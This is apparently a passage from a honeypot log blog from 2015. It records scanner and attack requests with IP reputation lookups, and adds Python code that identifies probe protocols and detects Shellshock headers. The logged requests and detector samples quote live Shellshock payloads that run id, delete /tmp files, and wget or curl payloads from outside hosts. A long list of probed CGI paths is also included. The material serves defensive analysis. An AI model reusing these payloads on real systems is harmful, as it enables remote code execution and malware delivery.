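The dumps above are readable once the cat -v notation is translated back to bytes (^@ = 0x00, ^V = 0x16, <FF> = 0xff): the first is a TLS ClientHello (record type 0x16, handshake type 0x01), the second a Kerberos AS-REQ (ASN.1 APPLICATION 10, pvno 5, "krbtgt"), the third an SMB negotiate with its dialect list, the fifth a Microsoft Media Server handshake (session id 0xb00bface) and the last an Oracle TNS connect asking for the listener version. That is the same mix as the "HTTP, Kerberos, Lanman" list in the FTP post further up: one scanner throwing every protocol probe it has at every open port. The following is an added example (my code, not the blog's) that does this identification from the first bytes; the sample payloads are constructed from the dumps above, cut after the identifying bytes, with filler where the dump was unreadable, and identify and SAMPLES are my own names:

```python
"""Identify the protocol a scanner's first packet speaks from the raw bytes a
honeypot logs on an unexpected port. Added example, not the blog's tooling."""
import re
import struct

# Constructed from the cat -v dumps above; truncated, with filler after the
# bytes each check needs.
SAMPLES = {
    "tls": b"\x16\x03\x00\x00\x53\x01\x00\x00\x4f\x03\x00\x3f\x47\xd7\xf7",
    "kerberos": (b"\x00\x00\x00\x71\x6a\x81\x6e\x30\x81\x6b"
                 b"\xa1\x03\x02\x01\x05\xa2\x03\x02\x01\x0a"
                 b"\xa4\x81\x5e\x30\x5c\x1b\x06krbtgt"),
    "smb": (b"\x00\x00\x00\xa4\xffSMB\x72\x00\x00\x00\x00\x08\x01\x40"
            b"\x02PC NETWORK PROGRAM 1.0\x00\x02NT LM 0.12\x00"),
    "mms": b"\x01\x00\x00\xfd\xce\xfa\x0b\xb0\xa0\x00\x00\x00MMS ",
    "tns": (b"\x00\x5a\x00\x00\x01\x00\x00\x00\x01\x36\x01\x2c"
            b"(CONNECT_DATA=(COMMAND=version))"),
    "unknown": b"\x3a\x00\x00\x00\x2f\x00\x00\x00\x02\x00\x00\x40",
}

KRB_MSG = {0x6A: "AS-REQ", 0x6C: "TGS-REQ"}          # ASN.1 APPLICATION 10 / 12
SMB_DIALECT = re.compile(rb"\x02([ -~]+?)\x00")       # dialect strings in a negotiate


def identify(payload):
    """Return (protocol, detail) for the first bytes of a TCP payload."""
    # TLS: record type 22 (handshake), version 3.x, handshake type 1 = ClientHello
    if len(payload) >= 6 and payload[0] == 0x16 and payload[1] == 0x03 and payload[5] == 0x01:
        return "tls", "ClientHello, record version 3.%d" % payload[2]
    # Microsoft Media Server: constant session id 0xb00bface (little endian) at offset 4
    if len(payload) >= 8 and struct.unpack("<I", payload[4:8])[0] == 0xB00BFACE:
        return "mms", "session id 0xb00bface"
    # Oracle TNS: 2-byte length, 2-byte checksum, packet type 1 = CONNECT
    if len(payload) >= 8 and payload[4] == 0x01 and b"(CONNECT_DATA=" in payload:
        start = payload.index(b"(CONNECT_DATA=")
        return "tns", payload[start:].decode("ascii", "replace")
    # SMB and Kerberos over TCP both sit behind a 4-byte length prefix
    body = payload[4:] if len(payload) > 4 and payload[0] == 0x00 else payload
    if body.startswith(b"\xffSMB") and len(body) >= 5:
        dialects = [d.decode("ascii") for d in SMB_DIALECT.findall(body)]
        return "smb1", "command 0x%02x, dialects=%s" % (body[4], ",".join(dialects))
    if body[:1] in (b"\x6a", b"\x6c") and b"\xa1\x03\x02\x01\x05" in body[:16]:
        return "kerberos", KRB_MSG[body[0]]
    return "unknown", "first bytes " + payload[:8].hex()


def classify_all(samples=SAMPLES):
    """Label every captured payload; unknown ones are kept for manual review."""
    return {label: identify(data)[0] for label, data in samples.items()}


if __name__ == "__main__":
    for label, data in SAMPLES.items():
        print("%-8s -> %s: %s" % (label, *identify(data)))
```

The fourth dump above does not match any of these checks and comes back as "unknown" with its leading bytes, which is the right outcome for a triage tool: it tells the analyst which capture still needs a look, instead of guessing. The length-prefix handling is what makes the SMB and Kerberos checks work on the raw TCP stream the honeypot stores, rather than on decoded packets.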

208.100.26[.]231
    Static Source: GeoIP data
  • Country: United States
  • ASN: AS32748 Steadfast Networks
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/208.100.26.231
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt


Sonntag, 20. September 2015

50.118.172.34 / 195.169.125.87 - HTTP javascript/html submission

BEGIN OF HTTP DATA:
2015-09-20 23:58:45
Source IP: 50.118.172.34
Country: US RiskScore: 1 Malware: []
GET /administrator/index.php HTTP/1.1
Host: 195.169.125.87
Accept-Language: en,en-us;q=0.7,es;q=0.3
User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Connection: close
Content-Type: text/html
Content-Length: 2221
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Charset: utf-8;q=0.7,*;q=0.7

<html><body><script type="text/javascript">ANCHORFREE_VERSION="413161526"</script><script type='text/javascript'>(function(){if(typeof(_AF2$runned)!='undefined'&&_AF2$runned==true){return}_AF2$={'SN':'HSSHIELD00ZZ','IP':'205.164.32.102','CH':'HSSCNL100714','CT':'0','HST':'&isUpdated=0','AFH':'hss498','RN':Math.floor(Math.random()*999),'TOP':(parent.location!=document.location||top.location!=document.location)?0:1,'AFVER':'4.18.2','FBW':'','FBWCNT':0};if(/^(.*,)?(11C)(,.*)?$/g.exec(_AF2$.CT)!=null){document.write("<scr"+"ipt src='http://box.anchorfree.net/insert/par.js?v="+ANCHORFREE_VERSION+"' type='text/javascript'></scr"+"ipt>")}document.write("<style type='text/css' title='AFc_css"+_AF2$.RN+"' >.AFc_body"+_AF2$.RN+"{} .AFc_all"+_AF2$.RN+",a.AFc_all"+_AF2$.RN+":hover,a.AFc_all"+_AF2$.RN+":visited{outline:none;background:transparent;border:none;margin:0;padding:0;top:0;left:0;text-decoration:none;overflow:hidden;display:block;z-index:666999;}</style>");})();</script><style type='text/css'>.AFhss_dpnone{display:none;width:0;height:0}</style><img src="about:blank"id="AFhss_trk"name="AFhss_trk"style="display:none"/><div id="AFhss_dfs"class="AFhss_dpnone"><div id="AFhss_adrp0"class="AFhss_dpnone"></div><div id="AFhss_adrp1"class="AFhss_dpnone"></div><div id="AFhss_adrp2"class="AFhss_dpnone"></div><div id="AFhss_adrp3"class="AFhss_dpnone"></div><div id="AFhss_adrp4"class="AFhss_dpnone"></div><div id="AFhss_adrp5"class="AFhss_dpnone"></div><div id="AFhss_adrp6"class="AFhss_dpnone"></div><div id="AFhss_adrp7"class="AFhss_dpnone"></div><div id="AFhss_adrp8"class="AFhss_dpnone"></div><div id="AFhss_adrp9"class="AFhss_dpnone"></div></div><script 
type='text/javascript'>(function(){if(typeof(_AF2$runned)!='undefined'&&_AF2$runned==true){return}_AF2$={'SN':'HSSHIELD00ZZ','IP':'205.164.32.102','CH':'HSSCNL100714','CT':'0','HST':'&isUpdated=0','AFH':'hss498','RN':Math.floor(Math.random()*999),'TOP':(parent.location!=document.location||top.location!=document.location)?0:1,'AFVER':'4.18.2','FBW':'','FBWCNT':0};if(_AF2$.TOP==1){document.write("<scr"+"ipt src='http://box.anchorfree.net/insert/41.js?v="+ANCHORFREE_VERSION+"' type='text/javascript'></scr"+"ipt>")}})()</script>Hello World</body></html>
50.118.172[.]34
    Static Source: GeoIP data
  • Country: United States
  • ASN: AS21321 Areti Internet Ltd.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/50.118.172.34

195.169.125[.]87
    Static Source: GeoIP data
  • Country: Netherlands
  • ASN: AS1103 SURFnet, The Netherlands
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/195.169.125.87

205.164.32[.]102
    Static Source: GeoIP data
  • Country: United States
  • ASN: AS21321 Areti Internet Ltd.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/205.164.32.102

Montag, 14. September 2015

195.141.90.114 - M'expr 1330 +7 and 1344 - 7

BEGIN OF HTTP DATA:
2015-09-14 23:55:34
Source IP: 195.141.90.114
Country: CH RiskScore: 1 Malware: []
GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;id;echo @ HTTP/1.0
Host: oc.johest.de
Cookie: () { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;id;echo @
User-Agent: () { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;id;echo @
Referer: () { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;id;echo @
Although I find it a bit funny to find 1337 in my logs, I believe it should not be there :-)
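
This request, the shellbot, the wget-from-79.99.248.2 and the ChinaZ entries above all carry the same bash function-export prefix "() {" in a header or query value, while the command behind it varies. Note that this scanner never sends the literal 1337: it sends expr 1330 + 7 and lets the target compute it, so a log search for "1337" finds nothing; a detector therefore has to key on the prefix, not on the marker. The following is an added example (my code, not the blog's) that does that and also pulls the download hosts out of the payload, which is what the blog does by hand when it lists a second IOC such as 23.229.121.186; the sample requests are copied from the entries above with headers abbreviated, the benign one is constructed, and scan_request, shellshock_payload and extract_hosts are my own names:

```python
"""Find Shellshock-style payloads in a raw HTTP request and pull out the hosts
they contact. Added example, not the blog's own tooling."""
import re

FUNC_PREFIX = re.compile(r"^\s*\(\)\s*\{")            # bash function-export marker "() {"
BODY_END = re.compile(r"\}\s*;\s*")                    # closes the (usually empty) body: "};"
REQUEST_LINE = re.compile(r"^(\S+)\s+(.*?)\s+(HTTP/\d\.\d)\s*$")
HOST_REF = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?\b")

SAMPLE_REQUESTS = {
    # 195.141.90.114: the same payload in the query string and three headers
    "expr-1337": "\n".join([
        "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;id;echo @ HTTP/1.0",
        "Host: oc.johest.de",
        "Cookie: () { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;id;echo @",
        "User-Agent: () { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;id;echo @",
        "Referer: () { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;id;echo @",
    ]),
    # 61.161.130.241: downloader in Referer and User-Agent (command shortened)
    "chinaz": "\n".join([
        "GET / HTTP/1.1",
        "Host: 109.234.106.8",
        'Referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-tnci >> /tmp/Run.sh;/tmp/Run.sh"',
        "Accept:*/*",
        'User-Agent: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-tnci >> /tmp/Run.sh;/tmp/Run.sh"',
    ]),
    # ordinary browser request for comparison (constructed)
    "benign": "\n".join([
        "GET /administrator/index.php HTTP/1.1",
        "Host: 195.169.125.87",
        "User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1",
    ]),
}


def shellshock_payload(value):
    """Return the command that follows a '() { ... };' prefix, or None."""
    if not FUNC_PREFIX.match(value):
        return None
    m = BODY_END.search(value)
    return value[m.end():].strip() if m else value.strip()


def scan_request(raw):
    """Return [(location, command)] for every query value and header that
    carries the function-export prefix. Location is 'query:<name>' or the
    header name, so the finding can be matched back to the log line."""
    lines = raw.splitlines()
    hits = []
    m = REQUEST_LINE.match(lines[0]) if lines else None
    if m and "?" in m.group(2):
        for param in m.group(2).split("?", 1)[1].split("&"):
            name, _, value = param.partition("=")
            payload = shellshock_payload(value)
            if payload is not None:
                hits.append(("query:" + name, payload))
    for line in lines[1:]:
        if not line.strip():            # blank line ends the header block
            break
        name, _, value = line.partition(":")
        payload = shellshock_payload(value)
        if payload is not None:
            hits.append((name.strip(), payload))
    return hits


def extract_hosts(payload):
    """IPv4 hosts (with optional port) referenced by a payload, for IOC pivoting."""
    return set(HOST_REF.findall(payload))


if __name__ == "__main__":
    for label, raw in SAMPLE_REQUESTS.items():
        for location, command in scan_request(raw):
            print(label, location, repr(command[:50]), extract_hosts(command))
```

Matching on the prefix rather than on a command list also catches the empty probes (the md5sum and ping variants in the entries above) that carry no download host at all; extract_hosts then returns an empty set, which is itself useful, since it separates reconnaissance from actual malware delivery in the same log.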

195.141.90[.]114
    Static Source: GeoIP data
  • Country: Switzerland
  • ASN: AS6730 Sunrise Communications AG
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/195.141.90.114
The following requests have been seen in this kind of attack.

GET / HTTP/1.0
GET /admin.cgi HTTP/1.0
GET /administrator.cgi HTTP/1.0
GET /agora.cgi HTTP/1.0
GET /aktivate/cgi-bin/catgy.cgi HTTP/1.0
GET /analyse.cgi HTTP/1.0
GET /apps/web/vs_diag.cgi HTTP/1.0
GET /axis-cgi/buffer/command.cgi HTTP/1.0
GET /b2-include/b2edit.showposts.php HTTP/1.0
GET /bandwidth/index.cgi HTTP/1.0
GET /bigconf.cgi HTTP/1.0
GET /cartcart.cgi HTTP/1.0
GET /cart.cgi HTTP/1.0
GET /catalog/index.cgi HTTP/1.0
GET /ccbill/whereami.cgi HTTP/1.0
GET /cgi-bin/ HTTP/1.0
GET /cgi-bin/14all-1.1.cgi HTTP/1.0
GET /cgi-bin/14all.cgi HTTP/1.0
GET /cgi-bin/%2f/admin.html HTTP/1.0
GET /cgi-bin/a1disp3.cgi HTTP/1.0
GET /cgi-bin/a1stats/a1disp3.cgi HTTP/1.0
GET /cgi-bin/a1stats/a1disp4.cgi HTTP/1.0
GET /cgi-bin/addbanner.cgi HTTP/1.0
GET /cgi-bin/add_ftp.cgi HTTP/1.0
GET /cgi-bin/adduser.cgi HTTP/1.0
GET /cgi-bin/admin/admin.cgi HTTP/1.0
GET /cgi-bin/admin.cgi HTTP/1.0
GET /cgi-bin/adminhot.cgi HTTP/1.0
GET /cgi-bin/admin.html HTTP/1.0
GET /cgi-bin/admin.pl HTTP/1.0
GET /cgi-bin/admin/setup.cgi HTTP/1.0
GET /cgi-bin/adminwww.cgi HTTP/1.0
GET /cgi-bin/af.cgi HTTP/1.0
GET /cgi-bin/aglimpse.cgi HTTP/1.0
GET /cgi-bin/alienform.cgi HTTP/1.0
GET /cgi-bin/AnyBoard.cgi HTTP/1.0
GET /cgi-bin/architext_query.cgi HTTP/1.0
GET /cgi-bin/astrocam.cgi HTTP/1.0
GET /cgi-bin/AT-admin.cgi HTTP/1.0
GET /cgi-bin/AT-generate.cgi HTTP/1.0
GET /cgi-bin/auction/auction.cgi HTTP/1.0
GET /cgi-bin/auktion.cgi HTTP/1.0
GET /cgi-bin/authLogin.cgi HTTP/1.0
GET /cgi-bin/ax-admin.cgi HTTP/1.0
GET /cgi-bin/ax.cgi HTTP/1.0
GET /cgi-bin/axs.cgi HTTP/1.0
GET /cgi-bin/badmin.cgi HTTP/1.0
GET /cgi-bin/banner.cgi HTTP/1.0
GET /cgi-bin/bannereditor.cgi HTTP/1.0
GET /cgi-bin/bash HTTP/1.0
GET /cgi-bin/bb-ack.sh HTTP/1.0
GET /cgi-bin/bb-histlog.sh HTTP/1.0
GET /cgi-bin/bb-hist.sh HTTP/1.0
GET /cgi-bin/bb-hostsvc.sh HTTP/1.0
GET /cgi-bin/bb-replog.sh HTTP/1.0
GET /cgi-bin/bb-rep.sh HTTP/1.0
GET /cgi-bin/BBS/bbs_forum.cgi HTTP/1.0
GET /cgi-bin/bbs_forum.cgi HTTP/1.0
GET /cgi-bin/bigconf.cgi HTTP/1.0
GET /cgi-bin/bizdb1-search.cgi HTTP/1.0
GET /cgi-bin/blog/mt-check.cgi HTTP/1.0
GET /cgi-bin/blog/mt-load.cgi HTTP/1.0
GET /cgi-bin/bnbform.cgi HTTP/1.0
GET /cgi-bin/book.cgi HTTP/1.0
GET /cgi-bin/boozt/admin/index.cgi HTTP/1.0
GET /cgi-bin/bsguest.cgi HTTP/1.0
GET /cgi-bin/bslist.cgi HTTP/1.0
GET /cgi-bin/build.cgi HTTP/1.0
GET /cgi-bin/bulk/bulk.cgi HTTP/1.0
GET /cgi-bin/cached_feed.cgi HTTP/1.0
GET /cgi-bin/cachemgr.cgi HTTP/1.0
GET /cgi-bin/calendar/index.cgi HTTP/1.0
GET /cgi-bin/cartmanager.cgi HTTP/1.0
GET /cgi-bin/cbmc/forums.cgi HTTP/1.0
GET /cgi-bin/ccvsblame.cgi HTTP/1.0
GET /cgi-bin/c_download.cgi HTTP/1.0
GET /cgi-bin/cgforum.cgi HTTP/1.0
GET /cgi-bin/cgi.cgi HTTP/1.0
GET /cgi-bin/cgi_process HTTP/1.0
GET /cgi-bin/classified.cgi HTTP/1.0
GET /cgi-bin/classifieds.cgi HTTP/1.0
GET /cgi-bin/classifieds/classifieds.cgi HTTP/1.0
GET /cgi-bin/classifieds/index.cgi HTTP/1.0
GET /cgi-bin/.cobalt/alert/service.cgi HTTP/1.0
GET /cgi-bin/.cobalt/message/message.cgi HTTP/1.0
GET /cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi HTTP/1.0
GET /cgi-bin/commandit.cgi HTTP/1.0
GET /cgi-bin/commerce.cgi HTTP/1.0
GET /cgi-bin/common/listrec.pl HTTP/1.0
GET /cgi-bin/compatible.cgi HTTP/1.0
GET /cgi-bin/contact.cgi HTTP/1.0
GET /cgi-bin/Count.cgi HTTP/1.0
GET /cgi-bin/csChatRBox.cgi HTTP/1.0
GET /cgi-bin/csGuestBook.cgi HTTP/1.0
GET /cgi-bin/csLiveSupport.cgi HTTP/1.0
GET /cgi-bin/CSMailto.cgi HTTP/1.0
GET /cgi-bin/CSMailto/CSMailto.cgi HTTP/1.0
GET /cgi-bin/csNews.cgi HTTP/1.0
GET /cgi-bin/csNewsPro.cgi HTTP/1.0
GET /cgi-bin/csPassword.cgi HTTP/1.0
GET /cgi-bin/csPassword/csPassword.cgi HTTP/1.0
GET /cgi-bin/csSearch.cgi HTTP/1.0
GET /cgi-bin/csv_db.cgi HTTP/1.0
GET /cgi-bin/cvsblame.cgi HTTP/1.0
GET /cgi-bin/cvslog.cgi HTTP/1.0
GET /cgi-bin/cvsquery.cgi HTTP/1.0
GET /cgi-bin/cvsqueryform.cgi HTTP/1.0
GET /cgi-bin/day5datacopier.cgi HTTP/1.0
GET /cgi-bin/day5datanotifier.cgi HTTP/1.0
GET /cgi-bin/db_manager.cgi HTTP/1.0
GET /cgi-bin/dbman/db.cgi HTTP/1.0
GET /cgi-bin/dcforum.cgi HTTP/1.0
GET /cgi-bin/defaultwebpage.cgi HTTP/1.0
GET /cgi-bin/dfire.cgi HTTP/1.0
GET /cgi-bin/diagnose.cgi HTTP/1.0
GET /cgi-bin/dig.cgi HTTP/1.0
GET /cgi-bin/directorypro.cgi HTTP/1.0
GET /cgi-bin/download.cgi HTTP/1.0
GET /cgi-bin/emu/html/emumail.cgi HTTP/1.0
GET /cgi-bin/emumail.cgi HTTP/1.0
GET /cgi-bin/emumail/emumail.cgi HTTP/1.0
GET /cgi-bin/enter.cgi HTTP/1.0
GET /cgi-bin/env.cgi HTTP/1.0
GET /cgi-bin/environ.cgi HTTP/1.0
GET /cgi-bin/ezadmin.cgi HTTP/1.0
GET /cgi-bin/ezboard.cgi HTTP/1.0
GET /cgi-bin/ezman.cgi HTTP/1.0
GET /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0
GET /cgi-bin/ezshopper3/loadpage.cgi HTTP/1.0
GET /cgi-bin/ezshopper/loadpage.cgi HTTP/1.0
GET /cgi-bin/ezshopper/search.cgi HTTP/1.0
GET /cgi-bin/faqmanager.cgi HTTP/1.0
GET /cgi-bin/FileSeek2.cgi HTTP/1.0
GET /cgi-bin/FileSeek.cgi HTTP/1.0
GET /cgi-bin/finger.cgi HTTP/1.0
GET /cgi-bin/firmwarecfg HTTP/1.0
GET /cgi-bin/flexform.cgi HTTP/1.0
GET /cgi-bin/fom.cgi HTTP/1.0
GET /cgi-bin/fom/fom.cgi HTTP/1.0
GET /cgi-bin/FormHandler.cgi HTTP/1.0
GET /cgi-bin/FormMail.cgi HTTP/1.0
GET /cgi-bin/forum.cgi HTTP/1.0
GET /cgi-bin/gbadmin.cgi HTTP/1.0
GET /cgi-bin/gbook/gbook.cgi HTTP/1.0
GET /cgi-bin/generate.cgi HTTP/1.0
GET /cgi-bin/getdoc.cgi HTTP/1.0
GET /cgi-bin/gH.cgi HTTP/1.0
GET /cgi-bin/gm-authors.cgi HTTP/1.0
GET /cgi-bin/gm.cgi HTTP/1.0
GET /cgi-bin/gm-cplog.cgi HTTP/1.0
GET /cgi-bin/guestbook.cgi HTTP/1.0
GET /cgi-bin/handler HTTP/1.0
GET /cgi-bin/handler.cgi HTTP/1.0
GET /cgi-bin/handler/netsonar HTTP/1.0
GET /cgi-bin/hello HTTP/1.0
GET /cgi-bin/hello.cgi HTTP/1.0
GET /cgi-bin/helpme HTTP/1.0
GET /cgi-bin/hitview.cgi HTTP/1.0
GET /cgi-bin/hsx.cgi HTTP/1.0
GET /cgi-bin/html2chtml.cgi HTTP/1.0
GET /cgi-bin/html2wml.cgi HTTP/1.0
GET /cgi-bin/htsearch.cgi HTTP/1.0
GET /cgi-bin/icat HTTP/1.0
GET /cgi-bin/ICuGI/EST/blast_detail.cgi HTTP/1.0
GET /cgi-bin/if/admin/nph-build.cgi HTTP/1.0
GET /cgi-bin/ikonboard/help.cgi HTTP/1.0
GET /cgi-bin/ImageFolio/admin/admin.cgi HTTP/1.0
GET /cgi-bin/imageFolio.cgi HTTP/1.0
GET /cgi-bin/index.cgi HTTP/1.0
GET /cgi-bin/info.sh HTTP/1.0
GET /cgi-bin/infosrch.cgi HTTP/1.0
GET /cgi-bin/jammail.pl HTTP/1.0
GET /cgi-bin/journal.cgi HTTP/1.0
GET /cgi-bin/lastlines.cgi HTTP/1.0
GET /cgi-bin/loadpage.cgi HTTP/1.0
GET /cgi-bin/login.cgi HTTP/1.0
GET /cgi-bin/logit.cgi HTTP/1.0
GET /cgi-bin/log-reader.cgi HTTP/1.0
GET /cgi-bin/lookwho.cgi HTTP/1.0
GET /cgi-bin/lwgate.cgi HTTP/1.0
GET /cgi-bin/MachineInfo HTTP/1.0
GET /cgi-bin/magiccard.cgi HTTP/1.0
GET /cgi-bin/mail/emumail.cgi HTTP/1.0
GET /cgi-bin/maillist.cgi HTTP/1.0
GET /cgi-bin/mailnews.cgi HTTP/1.0
GET /cgi-bin/mail/nph-mr.cgi HTTP/1.0
GET /cgi-bin/main.cgi HTTP/1.0
GET /cgi-bin/main_menu.pl HTTP/1.0
GET /cgi-bin/man.sh HTTP/1.0
GET /cgi-bin/meme.cgi HTTP/1.0
GET /cgi-bin/mini_logger.cgi HTTP/1.0
GET /cgi-bin/mmstdod.cgi HTTP/1.0
GET /cgi-bin/moin.cgi HTTP/1.0
GET /cgi-bin/mojo/mojo.cgi HTTP/1.0
GET /cgi-bin/mrtg.cgi HTTP/1.0
GET /cgi-bin/mt/mt-check.cgi HTTP/1.0
GET /cgi-bin/mt/mt-load.cgi HTTP/1.0
GET /cgi-bin/mt-static/mt-check.cgi HTTP/1.0
GET /cgi-bin/mt-static/mt-load.cgi HTTP/1.0
GET /cgi-bin/musicqueue.cgi HTTP/1.0
GET /cgi-bin/myguestbook.cgi HTTP/1.0
GET /cgi-bin/.namazu.cgi HTTP/1.0
GET /cgi-bin/netauth.cgi HTTP/1.0
GET /cgi-bin/netpad.cgi HTTP/1.0
GET /cgi-bin/newsdesk.cgi HTTP/1.0
GET /cgi-bin/nlog-smb.cgi HTTP/1.0
GET /cgi-bin/nph-emumail.cgi HTTP/1.0
GET /cgi-bin/nph-exploitscanget.cgi HTTP/1.0
GET /cgi-bin/nph-publish.cgi HTTP/1.0
GET /cgi-bin/nph-test.cgi HTTP/1.0
GET /cgi-bin/pagelog.cgi HTTP/1.0
GET /cgi-bin/pbcgi.cgi HTTP/1.0
GET /cgi-bin/perlshop.cgi HTTP/1.0
GET /cgi-bin/pfdispaly.cgi HTTP/1.0
GET /cgi-bin/pfdisplay.cgi HTTP/1.0
GET /cgi-bin/phf.cgi HTTP/1.0
GET /cgi-bin/photo/manage.cgi HTTP/1.0
GET /cgi-bin/photo/protected/manage.cgi HTTP/1.0
GET /cgi-bin/php HTTP/1.0
GET /cgi-bin/php.cgi HTTP/1.0
GET /cgi-bin/php4 HTTP/1.0
GET /cgi-bin/php4.cgi HTTP/1.0
GET /cgi-bin/php5.cgi HTTP/1.0
GET /cgi-bin/php5 HTTP/1.0
GET /cgi-bin/php5? HTTP/1.0
GET /cgi-bin/php5-cgi HTTP/1.0
GET /cgi-bin/php5-cli? HTTP/1.0
GET /cgi-bin/php-cgi HTTP/1.0
GET /cgi-bin/php.cgi HTTP/1.0
GET /cgi-bin/php-cgi.bin HTTP/1.0
GET /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi HTTP/1.0
GET /cgi-bin/pollssi.cgi HTTP/1.0
GET /cgi-bin/postcards.cgi HTTP/1.0
GET /cgi-bin/powerup/r.cgi HTTP/1.0
GET /cgi-bin/printenv HTTP/1.0
GET /cgi-bin/probecontrol.cgi HTTP/1.0
GET /cgi-bin/profile.cgi HTTP/1.0
GET /cgi-bin/publisher/search.cgi HTTP/1.0
GET /cgi-bin/quickstore.cgi HTTP/1.0
GET /cgi-bin/quizme.cgi HTTP/1.0
GET /cgi-bin/ratlog.cgi HTTP/1.0
GET /cgi-bin/r.cgi HTTP/1.0
GET /cgi-bin/recent.cgi HTTP/1.0
GET /cgi-bin/register.cgi HTTP/1.0
GET /cgi-bin/replicator/webpage.cgi/ HTTP/1.0
GET /cgi-bin/responder.cgi HTTP/1.0
GET /cgi-bin/robadmin.cgi HTTP/1.0
GET /cgi-bin/robpoll.cgi HTTP/1.0
GET /cgi-bin/sat-ir-web.pl HTTP/1.0
GET /cgi-bin/sbcgi/sitebuilder.cgi HTTP/1.0
GET /cgi-bin/scoadminreg.cgi HTTP/1.0
GET /cgi-bin-sdb/printenv HTTP/1.0
GET /cgi-bin/search HTTP/1.0
GET /cgi-bin/search.cgi HTTP/1.0
GET /cgi-bin/search/search.cgi HTTP/1.0
GET /cgi-bin/sendform.cgi HTTP/1.0
GET /cgi-bin/shop.cgi HTTP/1.0
GET /cgi-bin/shopper.cgi HTTP/1.0
GET /cgi-bin/shopplus.cgi HTTP/1.0
GET /cgi-bin/showcheckins.cgi HTTP/1.0
GET /cgi-bin/signon.cgi HTTP/1.0
GET /cgi-bin/simplestguest.cgi HTTP/1.0
GET /cgi-bin/simplestmail.cgi HTTP/1.0
GET /cgi-bin/smartsearch.cgi HTTP/1.0

Mittwoch, 9. September 2015

Checking Database config - 202.137.205.134

BEGIN OF HTTP DATA:
2015-09-09 01:48:57
Source IP: 202.137.205.134
Country: AU RiskScore: 1 Malware: []
HEAD http://195.169.125.87:80/PMA2011/ HTTP/1.1
Connection: Keep-Alive
Keep-Alive: 300
User-Agent: Mozilla/5.0 Jorgee
Host: 195.169.125.87
The IP made several attempts to reach database administration consoles (phpMyAdmin and the like).
So, time to show the new tool :-)
 python.exe .\spider.py -i 202.137.205.134
<?xml version="1.0" encoding="UTF-8"?>
<ip>202.137.205.134
<reporter>SANS Internet Storm Cast</reporter>
<comment>IP is listed on SANS ISC</comment>
<reference>https://isc.sans.edu/api/ip/202.137.205.134</reference>
</reporter>
</ip>

Montag, 31. August 2015

24x7-allrequestsallowed.com - 146.185.239.100

BEGIN OF HTTP DATA:
2015-08-31 21:33:47
Source IP: 146.185.239.100
Country: RU RiskScore: 1 Malware: []
GET http://24x7-allrequestsallowed.com/?PHPSESSID=mg2adea600143P%5BVJWPHYCF%5DJOU HTTP/1.1
Host: 24x7-allrequestsallowed.com
Accept: */*
Proxy-Connection: Keep-Alive
I find these requests from time to time on my server. When executing the statement by hand it leads to:
curl http://24x7-allrequestsallowed.com/?PHPSESSID=mg2adea600143P%5BVJWPHYCF%5DJOU
Thank you for using our service
So it looks like a check to find servers which can connect to outside servers.

Blacklist Status: BLACKLISTED 3/40
IP Address: 146.185.239.100
Reverse DNS: Unknown
ASN: AS5577
ASN Owner: root SA
ISP: Petersburg Internet Network ltd.
Continent: Europe
Country Code: (RU) Russian Federation


Perl favicon.icon Download attempt - 211.144.37.41


BEGIN OF HTTP DATA:
2015-08-30 15:49:21
Source IP: 211.144.37.41
Country: CN RiskScore: 10 Malware: []
GET /phppath/cgi_wrapper HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://46.38.251.16/favicon.icon;curl http://46.38.251.16/favicon.icon;GET http://46.38.251.16/favicon.icon;lwp-download http://46.38.251.16/favicon.icon;lynx http://46.38.251.16/favicon.icon ");'
Host: 195.169.125.87
Connection: Close
Sadly I get a connection refused by the server, so I am unable to get the specified file.

The source IP
Blacklist Status: BLACKLISTED 13/40
IP Address: 211.144.37.41
Reverse DNS: Unknown
ASN: AS9811
ASN Owner: srit corp.,beijing.
ISP: China Network Information Center
Continent: Asia

The download IP
Blacklist Status: POSSIBLY SAFE 0/40
IP Address: 46.38.251.16
Reverse DNS: v220100240662590.yourvserver.net
ASN: AS197540
ASN Owner: netcup GmbH
ISP: netcup GmbH
Continent: Europe

IBM XForce data for 211.144.37.41
"cats": {
